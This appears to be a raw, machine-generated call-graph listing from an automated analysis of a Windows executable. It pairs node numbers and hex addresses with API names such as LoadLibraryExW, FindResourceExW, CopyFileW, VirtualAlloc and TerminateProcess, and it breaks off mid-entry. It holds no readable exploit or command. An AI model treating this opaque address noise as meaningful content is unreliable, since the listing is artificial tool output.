VariantInit 97561->97595 97563 6f9fc7 97562->97563 97596 6d70dc 107 API calls 97562->97596 97563->97557 97564 6f9fff VariantClear 97563->97564 97564->97563 97565 6fa01e SysAllocString 97564->97565 97565->97563 97567 6fa107 97566->97567 97568 6fa12d 97566->97568 97597 6f96db 341 API calls Mailbox 97567->97597 97598 6e7804 105 API calls Mailbox 97568->97598 97570 6fa126 97572 6fa1bc VariantClear 97570->97572 97573 6fa1cd 97572->97573 97573->97548 97574 6fa149 97574->97572 97599 6e7804 105 API calls Mailbox 97574->97599 97577 6a0ff6 Mailbox 59 API calls 97576->97577 97578 6893f7 97577->97578 97579 6e69a9 92 API calls 97578->97579 97579->97548 97580->97548 97582 6d7a2f __wsetenvp 97581->97582 97584 6d7a41 97581->97584 97582->97584 97601 69fec6 97582->97601 97584->97554 97586 6d76ef 97585->97586 97587 6d7815 SysFreeString 97586->97587 97588 6d78a2 97586->97588 97589 6d7700 97586->97589 97590 6d7821 97586->97590 97587->97590 97588->97589 97588->97590 97591 6d78fc SysFreeString 97588->97591 97592 6d78ec lstrcmpiW 97588->97592 97589->97561 97590->97589 97605 6d7579 RaiseException 97590->97605 97591->97588 97592->97591 97594 6d791c SysFreeString 97592->97594 97594->97590 97595->97561 97596->97562 97597->97570 97598->97574 97599->97574 97600->97573 97602 69fed0 __wsetenvp 97601->97602 97603 6a0ff6 Mailbox 59 API calls 97602->97603 97604 69fee5 _wcscpy 97603->97604 97604->97584 97605->97590 97606->97525 97608 6a0ff6 Mailbox 59 API calls 97607->97608 97609 688193 97608->97609 97609->97525 97611 687e9a 97610->97611 97613 687ea3 _memmove 97610->97613 97611->97613 97614 687faf 97611->97614 97613->97525 97615 687fc2 97614->97615 97617 687fbf _memmove 97614->97617 97616 6a0ff6 Mailbox 59 API calls 97615->97616 97616->97617 97617->97613 97619 6877c7 59 API calls 97618->97619 97620 6ece1a 97619->97620 97621 6877c7 59 API calls 97620->97621 97622 6ece23 97621->97622 97623 6ece37 97622->97623 97910 689c9c 59 API calls 97622->97910 97625 689997 84 API calls 97623->97625 97626 6ece54 97625->97626 97627 6ece76 97626->97627 97628 6ecf55 97626->97628 97633 6ecf85 Mailbox 97626->97633 97629 689997 84 API calls 97627->97629 97714 684f3d 97628->97714 97631 6ece82 97629->97631 97634 6881a7 59 API calls 97631->97634 97633->97390 97637 6ece8e 97634->97637 97635 6ecf81 97635->97633 97636 6877c7 59 API calls 97635->97636 97639 6ecfb6 97636->97639 97642 6eced4 97637->97642 97643 6ecea2 97637->97643 97638 684f3d 136 API calls 97638->97635 97640 6877c7 59 API calls 97639->97640 97641 6ecfbf 97640->97641 97645 6877c7 59 API calls 97641->97645 97644 689997 84 API calls 97642->97644 97646 6881a7 59 API calls 97643->97646 97647 6ecee1 97644->97647 97648 6ecfc8 97645->97648 97649 6eceb2 97646->97649 97650 6881a7 59 API calls 97647->97650 97651 6877c7 59 API calls 97648->97651 97911 687e0b 97649->97911 97654 6eceed 97650->97654 97655 6ecfd1 97651->97655 97918 6e4cd3 GetFileAttributesW 97654->97918 97658 689997 84 API calls 97655->97658 97656 689997 84 API calls 97659 6ecec8 97656->97659 97661 6ecfde 97658->97661 97662 687c8e 59 API calls 97659->97662 97660 6ecef6 97663 6ecf09 97660->97663 97666 687b52 59 API calls 97660->97666 97738 6846f9 97661->97738 97662->97642 97665 689997 84 API calls 97663->97665 97673 6ecf0f 97663->97673 97668 6ecf36 97665->97668 97666->97663 97667 6ecff9 97789 687b52 97667->97789 97919 6e3a2b 75 API calls Mailbox 97668->97919 97672 6ed03c 97675 6881a7 59 API calls 97672->97675 97673->97633 97674 687b52 59 API calls 97676 6ed019 97674->97676 97677 6ed04a 97675->97677 97676->97672 97679 687d2c 59 API calls 97676->97679 97792 687c8e 97677->97792 97681 6ed02e 97679->97681 97683 687d2c 59 API calls 97681->97683 97682 687c8e 59 API calls 97684 6ed066 97682->97684 97683->97672 97685 687c8e 59 API calls 97684->97685 97686 6ed074 97685->97686 97687 689997 84 API calls 97686->97687 97688 6ed080 97687->97688 97801 6e42ad 97688->97801 97690 6ed091 97691 6e3e73 3 API calls 97690->97691 97692 6ed09b 97691->97692 97693 689997 84 API calls 97692->97693 97697 6ed0cc 97692->97697 97694 6ed0b9 97693->97694 97855 6e93df 97694->97855 97696 684faa 84 API calls 97696->97633 97697->97696 98564 6fcdf1 97698->98564 97700 6fe25b 97700->97390 97702 684fb4 97701->97702 97706 684fbb 97701->97706 97703 6a55d6 __fcloseall 83 API calls 97702->97703 97703->97706 97704 684fca 97704->97390 97705 684fdb FreeLibrary 97705->97704 97706->97704 97706->97705 98674 6e4696 GetFileAttributesW 97707->98674 97710->97386 97711->97390 97712->97384 97713->97388 97920 684d13 97714->97920 97719 684f68 LoadLibraryExW 97930 684cc8 97719->97930 97720 6bdd0f 97721 684faa 84 API calls 97720->97721 97723 6bdd16 97721->97723 97725 684cc8 3 API calls 97723->97725 97727 6bdd1e 97725->97727 97956 68506b 97727->97956 97728 684f8f 97728->97727 97729 684f9b 97728->97729 97730 684faa 84 API calls 97729->97730 97732 684fa0 97730->97732 97732->97635 97732->97638 97735 6bdd45 97964 685027 97735->97964 97739 6877c7 59 API calls 97738->97739 97740 68470f 97739->97740 97741 6877c7 59 API calls 97740->97741 97742 684717 97741->97742 97743 6877c7 59 API calls 97742->97743 97744 68471f 97743->97744 97745 6877c7 59 API calls 97744->97745 97746 684727 97745->97746 97747 6bd8fb 97746->97747 97748 68475b 97746->97748 97749 6881a7 59 API calls 97747->97749 97750 6879ab 59 API calls 97748->97750 97751 6bd904 97749->97751 97752 684769 97750->97752 98184 687eec 97751->98184 97754 687e8c 59 API calls 97752->97754 97755 684773 97754->97755 97756 68479e 97755->97756 97757 6879ab 59 API calls 97755->97757 97759 6847bd 97756->97759 97760 6bd924 97756->97760 97773 6847de 97756->97773 97761 684794 97757->97761 97762 687b52 59 API calls 97759->97762 97764 6bd9f4 97760->97764 97774 6bd9dd 97760->97774 97782 6bd95b 97760->97782 97765 687e8c 59 API calls 97761->97765 97766 6847c7 97762->97766 97763 6847ef 97767 684801 97763->97767 97769 6881a7 59 API calls 97763->97769 97768 687d2c 59 API calls 97764->97768 97765->97756 97771 6879ab 59 API calls 97766->97771 97766->97773 97770 684811 97767->97770 97772 6881a7 59 API calls 97767->97772 97784 6bd9b1 97768->97784 97769->97767 97775 6881a7 59 API calls 97770->97775 97777 684818 97770->97777 97771->97773 97772->97770 98171 6879ab 97773->98171 97774->97764 97779 6bd9c8 97774->97779 97775->97777 97776 6881a7 59 API calls 97786 68481f Mailbox 97776->97786 97777->97776 97777->97786 97778 6bd9b9 97780 687d2c 59 API calls 97778->97780 97781 687d2c 59 API calls 97779->97781 97780->97784 97781->97784 97782->97778 97787 6bd9a4 97782->97787 97783 687b52 59 API calls 97783->97784 97784->97773 97784->97783 98188 687a84 59 API calls 2 library calls 97784->98188 97786->97667 97788 687d2c 59 API calls 97787->97788 97788->97784 97790 687faf 59 API calls 97789->97790 97791 687b5d 97790->97791 97791->97672 97791->97674 97793 687ca0 97792->97793 97794 6bf094 97792->97794 98190 687bb1 97793->98190 98196 6d8123 59 API calls _memmove 97794->98196 97797 687cac 97797->97682 97798 6bf09e 97799 6881a7 59 API calls 97798->97799 97800 6bf0a6 Mailbox 97799->97800 97802 6e42c9 97801->97802 97803 6e42ce 97802->97803 97804 6e42dc 97802->97804 97805 6881a7 59 API calls 97803->97805 97806 6877c7 59 API calls 97804->97806 97854 6e42d7 Mailbox 97805->97854 97807 6e42e4 97806->97807 97808 6877c7 59 API calls 97807->97808 97809 6e42ec 97808->97809 97810 6877c7 59 API calls 97809->97810 97811 6e42f7 97810->97811 97812 6877c7 59 API calls 97811->97812 97813 6e42ff 97812->97813 97814 6877c7 59 API calls 97813->97814 97815 6e4307 97814->97815 97816 6877c7 59 API calls 97815->97816 97817 6e430f 97816->97817 97818 6877c7 59 API calls 97817->97818 97819 6e4317 97818->97819 97820 6877c7 59 API calls 97819->97820 97821 6e431f 97820->97821 97822 6846f9 59 API calls 97821->97822 97823 6e4336 97822->97823 97824 6846f9 59 API calls 97823->97824 97825 6e434f 97824->97825 97826 687b52 59 API calls 97825->97826 97827 6e435b 97826->97827 97828 6e436e 97827->97828 97829 687e8c 59 API calls 97827->97829 97830 687b52 59 API calls 97828->97830 97829->97828 97831 6e4377 97830->97831 97832 6e4387 97831->97832 97834 687e8c 59 API calls 97831->97834 97833 6881a7 59 API calls 97832->97833 97835 6e4393 97833->97835 97834->97832 97836 687c8e 59 API calls 97835->97836 97837 6e439f 97836->97837 98197 6e445f 59 API calls 97837->98197 97839 6e43ae 98198 6e445f 59 API calls 97839->98198 97841 6e43c1 97842 687b52 59 API calls 97841->97842 97843 6e43cb 97842->97843 97844 6e43e2 97843->97844 97845 6e43d0 97843->97845 97847 687b52 59 API calls 97844->97847 97846 687e0b 59 API calls 97845->97846 97849 6e43dd 97846->97849 97848 6e43eb 97847->97848 97850 6e4409 97848->97850 97851 687e0b 59 API calls 97848->97851 97852 687c8e 59 API calls 97849->97852 97853 687c8e 59 API calls 97850->97853 97851->97849 97852->97850 97853->97854 97854->97690 97856 6e93ec __write_nolock 97855->97856 97857 6a0ff6 Mailbox 59 API calls 97856->97857 97858 6e9449 97857->97858 97859 68538e 59 API calls 97858->97859 97860 6e9453 97859->97860 97861 6e91e9 GetSystemTimeAsFileTime 97860->97861 97862 6e945e 97861->97862 97863 685045 85 API calls 97862->97863 97864 6e9471 _wcscmp 97863->97864 97865 6e9495 97864->97865 97866 6e9542 97864->97866 98229 6e99be 97865->98229 97868 6e99be 96 API calls 97866->97868 97883 6e950e _wcscat 97868->97883 97871 68506b 74 API calls 97872 6e9567 97871->97872 97874 68506b 74 API calls 97872->97874 97873 6e954b 97873->97697 97876 6e9577 97874->97876 97875 6e94c3 _wcscat _wcscpy 98236 6a432e 58 API calls __wsplitpath_helper 97875->98236 97877 68506b 74 API calls 97876->97877 97879 6e9592 97877->97879 97880 68506b 74 API calls 97879->97880 97881 6e95a2 97880->97881 97882 68506b 74 API calls 97881->97882 97884 6e95bd 97882->97884 97883->97871 97883->97873 97885 68506b 74 API calls 97884->97885 97886 6e95cd 97885->97886 97887 68506b 74 API calls 97886->97887 97888 6e95dd 97887->97888 97889 68506b 74 API calls 97888->97889 97890 6e95ed 97889->97890 98199 6e9b6d GetTempPathW GetTempFileNameW 97890->98199 97892 6e95f9 97893 6a548b 115 API calls 97892->97893 97904 6e960a 97893->97904 97894 6e96c4 98213 6a55d6 97894->98213 97896 6e96cf 97898 6e96e9 97896->97898 97899 6e96d5 DeleteFileW 97896->97899 97897 68506b 74 API calls 97897->97904 97900 6e978f CopyFileW 97898->97900 97905 6e96f3 _wcsncpy 97898->97905 97899->97873 97901 6e97b7 DeleteFileW 97900->97901 97902 6e97a5 DeleteFileW 97900->97902 98226 6e9b2c CreateFileW 97901->98226 97902->97873 97904->97873 97904->97894 97904->97897 98200 6a4a93 97904->98200 98237 6e8d90 97905->98237 97910->97623 97912 687e1f 97911->97912 97913 6bf173 97911->97913 98559 687db0 97912->98559 97915 688189 59 API calls 97913->97915 97917 6bf17e __wsetenvp _memmove 97915->97917 97916 687e2a 97916->97656 97918->97660 97919->97673 97969 684d61 97920->97969 97923 684d3a 97925 684d4a FreeLibrary 97923->97925 97926 684d53 97923->97926 97924 684d61 2 API calls 97924->97923 97925->97926 97927 6a548b 97926->97927 97973 6a54a0 97927->97973 97929 684f5c 97929->97719 97929->97720 98073 684d94 97930->98073 97933 684d94 2 API calls 97936 684ced 97933->97936 97934 684d08 97937 684dd0 97934->97937 97935 684cff FreeLibrary 97935->97934 97936->97934 97936->97935 97938 6a0ff6 Mailbox 59 API calls 97937->97938 97939 684de5 97938->97939 98077 68538e 97939->98077 97941 684df1 _memmove 97942 684e2c 97941->97942 97943 684ee9 97941->97943 97944 684f21 97941->97944 97945 685027 69 API calls 97942->97945 98080 684fe9 CreateStreamOnHGlobal 97943->98080 98091 6e9ba5 95 API calls 97944->98091 97950 684e35 97945->97950 97948 68506b 74 API calls 97948->97950 97950->97948 97951 6bdcd0 97950->97951 97955 684ec9 97950->97955 98086 685045 97950->98086 97952 685045 85 API calls 97951->97952 97953 6bdce4 97952->97953 97954 68506b 74 API calls 97953->97954 97954->97955 97955->97728 97957 68507d 97956->97957 97958 6bddf6 97956->97958 98115 6a5812 97957->98115 97961 6e9393 98148 6e91e9 97961->98148 97963 6e93a9 97963->97735 97965 6bddb9 97964->97965 97966 685036 97964->97966 98153 6a5e90 97966->98153 97968 68503e 97970 684d2e 97969->97970 97971 684d6a LoadLibraryA 97969->97971 97970->97923 97970->97924 97971->97970 97972 684d7b GetProcAddress 97971->97972 97972->97970 97975 6a54ac __freefls@4 97973->97975 97974 6a54bf 98022 6a8d68 58 API calls __getptd_noexit 97974->98022 97975->97974 97977 6a54f0 97975->97977 97992 6b0738 97977->97992 97978 6a54c4 98023 6a8ff6 9 API calls __vswprintf_l 97978->98023 97981 6a54f5 97982 6a550b 97981->97982 97983 6a54fe 97981->97983 97985 6a5535 97982->97985 97986 6a5515 97982->97986 98024 6a8d68 58 API calls __getptd_noexit 97983->98024 98007 6b0857 97985->98007 98025 6a8d68 58 API calls __getptd_noexit 97986->98025 97987 6a54cf @_EH4_CallFilterFunc@8 __freefls@4 97987->97929 97993 6b0744 __freefls@4 97992->97993 98027 6a9e4b 97993->98027 97995 6b07cd 98063 6a8a5d 58 API calls 2 library calls 97995->98063 97998 6b07d4 98005 6b07c6 97998->98005 98064 6aa06b InitializeCriticalSectionAndSpinCount 97998->98064 97999 6b0843 __freefls@4 97999->97981 98000 6b0752 98000->97995 98000->98005 98037 6a9ed3 98000->98037 98061 6a6e8d 59 API calls __lock 98000->98061 98062 6a6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98000->98062 98004 6b07fa EnterCriticalSection 98004->98005 98034 6b084e 98005->98034 98008 6b0877 __wopenfile 98007->98008 98009 6b0891 98008->98009 98021 6b0a4c 98008->98021 98070 6a3a0b 60 API calls 2 library calls 98008->98070 98068 6a8d68 58 API calls __getptd_noexit 98009->98068 98011 6b0896 98069 6a8ff6 9 API calls __vswprintf_l 98011->98069 98013 6b0aaf 98065 6b87f1 98013->98065 98015 6a5540 98026 6a5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98015->98026 98017 6b0a45 98017->98021 98071 6a3a0b 60 API calls 2 library calls 98017->98071 98019 6b0a64 98019->98021 98072 6a3a0b 60 API calls 2 library calls 98019->98072 98021->98009 98021->98013 98022->97978 98023->97987 98024->97987 98025->97987 98026->97987 98028 6a9e6f EnterCriticalSection 98027->98028 98029 6a9e5c 98027->98029 98028->98000 98030 6a9ed3 __mtinitlocknum 57 API calls 98029->98030 98031 6a9e62 98030->98031 98031->98028 98032 6a32f5 __lock 57 API calls 98031->98032 98033 6a9e6e 98032->98033 98033->98028 98035 6a9fb5 _doexit LeaveCriticalSection 98034->98035 98036 6b0855 98035->98036 98036->97999 98038 6a9edf __freefls@4 98037->98038 98039 6a9ee8 98038->98039 98040 6a9f00 98038->98040 98041 6aa3ab __FF_MSGBANNER 58 API calls 98039->98041 98043 6a8a5d __malloc_crt 58 API calls 98040->98043 98044 6a9f21 __freefls@4 98040->98044 98042 6a9eed 98041->98042 98045 6aa408 __NMSG_WRITE 58 API calls 98042->98045 98046 6a9f15 98043->98046 98044->98000 98047 6a9ef4 98045->98047 98048 6a9f2b 98046->98048 98049 6a9f1c 98046->98049 98051 6a32df __mtinitlocknum GetModuleHandleExW GetProcAddress ExitProcess 98047->98051 98050 6a9e4b __lock 58 API calls 98048->98050 98052 6a8d68 __vswprintf_l 58 API calls 98049->98052 98053 6a9f32 98050->98053 98054 6a9efe 98051->98054 98052->98044 98055 6a9f3f 98053->98055 98056 6a9f57 98053->98056 98054->98040 98057 6aa06b __mtinitlocknum InitializeCriticalSectionAndSpinCount 98055->98057 98058 6a2f95 _free 58 API calls 98056->98058 98059 6a9f4b 98057->98059 98058->98059 98060 6a9f73 __mtinitlocknum LeaveCriticalSection 98059->98060 98060->98044 98061->98000 98062->98000 98063->97998 98064->98004 98066 6b7fd5 __wsopen_helper 109 API calls 98065->98066 98067 6b880a 98066->98067 98067->98015 98068->98011 98069->98015 98070->98017 98071->98019 98072->98021 98074 684ce1 98073->98074 98075 684d9d LoadLibraryA 98073->98075 98074->97933 98074->97936 98075->98074 98076 684dae GetProcAddress 98075->98076 98076->98074 98078 6a0ff6 Mailbox 59 API calls 98077->98078 98079 6853a0 98078->98079 98079->97941 98081 685003 FindResourceExW 98080->98081 98085 685020 98080->98085 98082 6bdd5c LoadResource 98081->98082 98081->98085 98083 6bdd71 SizeofResource 98082->98083 98082->98085 98084 6bdd85 LockResource 98083->98084 98083->98085 98084->98085 98085->97942 98087 685054 98086->98087 98088 6bddd4 98086->98088 98092 6a5a7d 98087->98092 98090 685062 98090->97950 98091->97942 98096 6a5a89 __freefls@4 98092->98096 98093 6a5a9b 98105 6a8d68 58 API calls __getptd_noexit 98093->98105 98095 6a5ac1 98107 6a6e4e 98095->98107 98096->98093 98096->98095 98098 6a5aa0 98106 6a8ff6 9 API calls __vswprintf_l 98098->98106 98102 6a5ad6 98114 6a5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98102->98114 98103 6a5aab __freefls@4 98103->98090 98105->98098 98106->98103 98108 6a6e5e 98107->98108 98109 6a6e80 EnterCriticalSection 98107->98109 98108->98109 98110 6a6e66 98108->98110 98111 6a5ac7 98109->98111 98112 6a9e4b __lock 58 API calls 98110->98112 98113 6a59ee 83 API calls 5 library calls 98111->98113 98112->98111 98113->98102 98114->98103 98118 6a582d 98115->98118 98117 68508e 98117->97961 98119 6a5839 __freefls@4 98118->98119 98120 6a584f _memset 98119->98120 98121 6a587c 98119->98121 98122 6a5874 __freefls@4 98119->98122 98145 6a8d68 58 API calls __getptd_noexit 98120->98145 98123 6a6e4e __lock_file 59 API calls 98121->98123 98122->98117 98125 6a5882 98123->98125 98131 6a564d 98125->98131 98126 6a5869 98146 6a8ff6 9 API calls __vswprintf_l 98126->98146 98132 6a5683 98131->98132 98135 6a5668 _memset 98131->98135 98147 6a58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98132->98147 98133 6a5673 98134 6a8d68 __vswprintf_l 58 API calls 98133->98134 98144 6a5678 98134->98144 98135->98132 98135->98133 98142 6a56c3 98135->98142 98136 6a8ff6 __vswprintf_l 9 API calls 98136->98132 98137 6b0df7 __filbuf 72 API calls 98137->98142 98138 6a57d4 _memset 98141 6a8d68 __vswprintf_l 58 API calls 98138->98141 98139 6b0f18 _memcpy_s 58 API calls 98139->98142 98140 6a4916 _fprintf 58 API calls 98140->98142 98141->98144 98142->98132 98142->98137 98142->98138 98142->98139 98142->98140 98143 6b10ab __read_nolock 70 API calls 98142->98143 98143->98142 98144->98136 98145->98126 98146->98122 98147->98122 98151 6a543a GetSystemTimeAsFileTime 98148->98151 98150 6e91f8 98150->97963 98152 6a5468 __aulldiv 98151->98152 98152->98150 98154 6a5e9c __freefls@4 98153->98154 98155 6a5eae 98154->98155 98156 6a5ec3 98154->98156 98167 6a8d68 58 API calls __getptd_noexit 98155->98167 98158 6a6e4e __lock_file 59 API calls 98156->98158 98160 6a5ec9 98158->98160 98159 6a5eb3 98168 6a8ff6 9 API calls __vswprintf_l 98159->98168 98169 6a5b00 67 API calls 6 library calls 98160->98169 98163 6a5ed4 98170 6a5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 98163->98170 98165 6a5ee6 98166 6a5ebe __freefls@4 98165->98166 98166->97968 98167->98159 98168->98166 98169->98163 98170->98165 98172 6879ba 98171->98172 98173 687a17 98171->98173 98172->98173 98175 6879c5 98172->98175 98174 687e8c 59 API calls 98173->98174 98181 6879e8 _memmove 98174->98181 98176 6879e0 98175->98176 98177 6bef32 98175->98177 98189 688087 59 API calls Mailbox 98176->98189 98178 688189 59 API calls 98177->98178 98180 6bef3c 98178->98180 98182 6a0ff6 Mailbox 59 API calls 98180->98182 98181->97763 98183 6bef5c 98182->98183 98185 687f06 98184->98185 98187 687ef9 98184->98187 98186 6a0ff6 Mailbox 59 API calls 98185->98186 98186->98187 98187->97756 98188->97784 98189->98181 98191 687bbf 98190->98191 98195 687be5 _memmove 98190->98195 98192 6a0ff6 Mailbox 59 API calls 98191->98192 98191->98195 98193 687c34 98192->98193 98194 6a0ff6 Mailbox 59 API calls 98193->98194 98194->98195 98195->97797 98196->97798 98197->97839 98198->97841 98199->97892 98201 6a4a9f __freefls@4 98200->98201 98202 6a4abd 98201->98202 98203 6a4ad5 98201->98203 98205 6a4acd __freefls@4 98201->98205 98280 6a8d68 58 API calls __getptd_noexit 98202->98280 98206 6a6e4e __lock_file 59 API calls 98203->98206 98205->97904 98208 6a4adb 98206->98208 98207 6a4ac2 98281 6a8ff6 9 API calls __vswprintf_l 98207->98281 98268 6a493a 98208->98268 98214 6a55e2 __freefls@4 98213->98214 98215 6a560e 98214->98215 98216 6a55f6 98214->98216 98218 6a6e4e __lock_file 59 API calls 98215->98218 98223 6a5606 __freefls@4 98215->98223 98427 6a8d68 58 API calls __getptd_noexit 98216->98427 98220 6a5620 98218->98220 98219 6a55fb 98428 6a8ff6 9 API calls __vswprintf_l 98219->98428 98411 6a556a 98220->98411 98223->97896 98227 6e9b68 98226->98227 98227->97873 98230 6e99d2 __tzset_nolock _wcscmp 98229->98230 98231 68506b 74 API calls 98230->98231 98232 6e949a 98230->98232 98233 6e9393 GetSystemTimeAsFileTime 98230->98233 98234 685045 85 API calls 98230->98234 98231->98230 98232->97873 98235 6a432e 58 API calls __wsplitpath_helper 98232->98235 98233->98230 98234->98230 98235->97875 98236->97883 98238 6e8da9 98237->98238 98239 6e8d9b 98237->98239 98270 6a4949 98268->98270 98277 6a4967 98268->98277 98269 6a4957 98318 6a8d68 58 API calls __getptd_noexit 98269->98318 98270->98269 98272 6a4981 _memmove 98270->98272 98270->98277 98272->98277 98283 6a4916 98272->98283 98290 6adac6 98272->98290 98320 6a4c6d 98272->98320 98326 6ab05e 78 API calls 7 library calls 98272->98326 98273 6a495c 98319 6a8ff6 9 API calls __vswprintf_l 98273->98319 98282 6a4b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 98277->98282 98280->98207 98281->98205 98282->98205 98284 6a4920 98283->98284 98285 6a4935 98283->98285 98285->98272 98291 6adad2 __freefls@4 98290->98291 98292 6adadf 98291->98292 98293 6adaf6 98291->98293 98318->98273 98319->98277 98321 6a4ca4 98320->98321 98322 6a4c80 98320->98322 98321->98272 98322->98321 98323 6a4916 _fprintf 58 API calls 98322->98323 98326->98272 98412 6a5579 98411->98412 98414 6a558d 98411->98414 98460 6a8d68 58 API calls __getptd_noexit 98412->98460 98416 6a5589 98414->98416 98417 6a4c6d __flush 78 API calls 98414->98417 98415 6a557e 98429 6a5645 LeaveCriticalSection LeaveCriticalSection __wfsopen 98416->98429 98419 6a5599 98417->98419 98430 6b0dc7 98419->98430 98427->98219 98428->98223 98429->98223 98460->98415 98560 687dbf __wsetenvp 98559->98560 98561 688189 59 API calls 98560->98561 98562 687dd0 _memmove 98560->98562 98563 6bf130 _memmove 98561->98563 98562->97916 98565 689997 84 API calls 98564->98565 98566 6fce2e 98565->98566 98590 6fce75 Mailbox 98566->98590 98602 6fdab9 98566->98602 98568 6fd0cd 98569 6fd242 98568->98569 98573 6fd0db 98568->98573 98651 6fdbdc 92 API calls Mailbox 98569->98651 98572 6fd251 98572->98573 98574 6fd25d 98572->98574 98615 6fcc82 98573->98615 98574->98590 98575 689997 84 API calls 98593 6fcec6 Mailbox 98575->98593 98580 6fd114 98630 6a0e48 98580->98630 98583 6fd12e 98636 6ea0b5 89 API calls 4 library calls 98583->98636 98584 6fd147 98637 68942e 98584->98637 98588 6fd139 GetCurrentProcess TerminateProcess 98588->98584 98590->97700 98593->98568 98593->98575 98593->98590 98634 6ef835 59 API calls 2 library calls 98593->98634 98635 6fd2f3 61 API calls 2 library calls 98593->98635 98594 6fd2b8 98594->98590 98598 6fd2cc FreeLibrary 98594->98598 98595 6fd17f 98649 6fd95d 107 API calls _free 98595->98649 98598->98590 98600 689e9c 60 API calls 98601 6fd190 98600->98601 98601->98594 98601->98600 98650 688ea0 59 API calls Mailbox 98601->98650 98652 6fd95d 107 API calls _free 98601->98652 98603 687faf 59 API calls 98602->98603 98604 6fdad4 CharLowerBuffW 98603->98604 98653 6df658 98604->98653 98608 6877c7 59 API calls 98609 6fdb0d 98608->98609 98610 6879ab 59 API calls 98609->98610 98611 6fdb24 98610->98611 98612 687e8c 59 API calls 98611->98612 98613 6fdb30 Mailbox 98612->98613 98614 6fdb6c Mailbox 98613->98614 98660 6fd2f3 61 API calls 2 library calls 98613->98660 98614->98593 98616 6fcc9d 98615->98616 98617 6fccf2 98615->98617 98618 6a0ff6 Mailbox 59 API calls 98616->98618 98621 6fdd64 98617->98621 98620 6fccbf 98618->98620 98619 6a0ff6 Mailbox 59 API calls 98619->98620 98620->98617 98620->98619 98622 6fdf8d Mailbox 98621->98622 98629 6fdd87 _strcat _wcscpy __wsetenvp 98621->98629 98622->98580 98623 689d46 59 API calls 98623->98629 98624 689c9c 59 API calls 98624->98629 98625 689cf8 59 API calls 98625->98629 98626 689997 84 API calls 98626->98629 98627 6a594c 58 API calls std::exception::_Copy_str 98627->98629 98629->98622 98629->98623 98629->98624 98629->98625 98629->98626 98629->98627 98663 6e5b29 61 API calls 2 library calls 98629->98663 98631 6a0e5d 98630->98631 98632 6a0ef5 VirtualAlloc 98631->98632 98633 6a0ec3 98631->98633 98632->98633 98633->98583 98633->98584 98634->98593 98635->98593 98636->98588 98638 689436 98637->98638 98639 6a0ff6 Mailbox 59 API calls 98638->98639 98640 689444 98639->98640 98641 689450 98640->98641 98664 68935c 59 API calls Mailbox 98640->98664 98643 6891b0 98641->98643 98665 6892c0 98643->98665 98645 6a0ff6 Mailbox 59 API calls 98646 68925b 98645->98646 98646->98601 98648 688ea0 59 API calls Mailbox 98646->98648 98647 6891bf 98647->98645 98647->98646 98648->98595 98649->98601 98650->98601 98651->98572 98652->98601 98654 6df683 __wsetenvp 98653->98654 98656 6df6b8 98654->98656 98658 6df769 98654->98658 98659 6df6c2 98654->98659 98656->98659 98661 687a24 61 API calls 98656->98661 98658->98659 98662 687a24 61 API calls 98658->98662 98659->98608 98659->98613 98660->98614 98661->98656 98662->98658 98663->98629 98664->98641 98666 6892c9 Mailbox 98665->98666 98667 6bf5c8 98666->98667 98672 6892d3 98666->98672 98668 6a0ff6 Mailbox 59 API calls 98667->98668 98670 6bf5d4 98668->98670 98669 6892da 98669->98647 98672->98669 98673 689df0 59 API calls Mailbox 98672->98673 98673->98672 98675 6e3e7a 98674->98675 98676 6e46b1 FindFirstFileW 98674->98676 98675->97390 98676->98675 98677 6e46c6 FindClose 98676->98677 98677->98675 98679 6882ef 98678->98679 98682 68830a 98678->98682 98680 687faf 59 API calls 98679->98680 98681 6882f7 CharUpperBuffW 98680->98681 98681->98682 98682->97400 98684 68f3b1 98683->98684 98685 68f3d2 98684->98685 98802 6ea0b5 89 API calls 4 library calls 98684->98802 98685->97440 98688 6884ed 98687->98688 98689 6bf1e6 98687->98689 98690 6a0ff6 Mailbox 59 API calls 98688->98690 98691 6884f4 98690->98691 98692 688515 98691->98692 98803 688794 59 API calls Mailbox 98691->98803 98692->97417 98692->97426 98695 6c50ed 98694->98695 98707 690b55 98694->98707 98850 6ea0b5 89 API calls 4 library calls 98695->98850 98697 690e44 98698 690e5a 98697->98698 98847 6911d0 10 API calls Mailbox 98697->98847 98698->97446 98701 691044 98701->98698 98702 691051 98701->98702 98848 6911f3 341 API calls Mailbox 98702->98848 98703 690bab PeekMessageW 98718 690b65 Mailbox 98703->98718 98706 691058 LockWindowUpdate DestroyWindow GetMessageW 98706->98698 98709 69108a 98706->98709 98707->98718 98851 689fbd 60 API calls 98707->98851 98852 6d68bf 341 API calls 98707->98852 98708 6c52ab Sleep 98708->98718 98711 6c6082 TranslateMessage DispatchMessageW GetMessageW 98709->98711 98711->98711 98712 6c60b2 98711->98712 98712->98698 98713 6c517a TranslateAcceleratorW 98716 690fa3 PeekMessageW 98713->98716 98713->98718 98714 689fbd 60 API calls 98714->98718 98715 690fbf TranslateMessage DispatchMessageW 98715->98716 98716->98718 98717 6c5c49 WaitForSingleObject 98717->98718 98722 6c5c66 GetExitCodeProcess CloseHandle 98717->98722 98718->98697 98718->98703 98718->98708 98718->98713 98718->98714 98718->98715 98718->98716 98718->98717 98719 690fee Mailbox 98718->98719 98721 690e73 timeGetTime 98718->98721 98723 690fdd Sleep 98718->98723 98724 6881a7 59 API calls 98718->98724 98726 6c5f22 Sleep 98718->98726 98728 6a0ff6 59 API calls Mailbox 98718->98728 98730 6910f5 98718->98730 98732 6910ae timeGetTime 98718->98732 98736 689997 84 API calls 98718->98736 98751 68a000 314 API calls 98718->98751 98753 68f5c0 314 API calls 98718->98753 98754 68fe40 314 API calls 98718->98754 98757 6ea0b5 89 API calls 98718->98757 98759 688620 69 API calls 98718->98759 98760 689df0 59 API calls Mailbox 98718->98760 98761 68b89c 314 API calls 98718->98761 98762 68843f 59 API calls 98718->98762 98763 687f41 59 API calls 98718->98763 98764 688b13 69 API calls 98718->98764 98765 6d66f4 59 API calls Mailbox 98718->98765 98766 6c59ff VariantClear 98718->98766 98767 6c5a95 VariantClear 98718->98767 98768 6d7405 59 API calls 98718->98768 98769 688e34 59 API calls Mailbox 98718->98769 98770 6c5843 VariantClear 98718->98770 98804 68e580 98718->98804 98811 68e800 98718->98811 98842 6831ce 98718->98842 98853 70629f 59 API calls 98718->98853 98854 6e9c9f 59 API 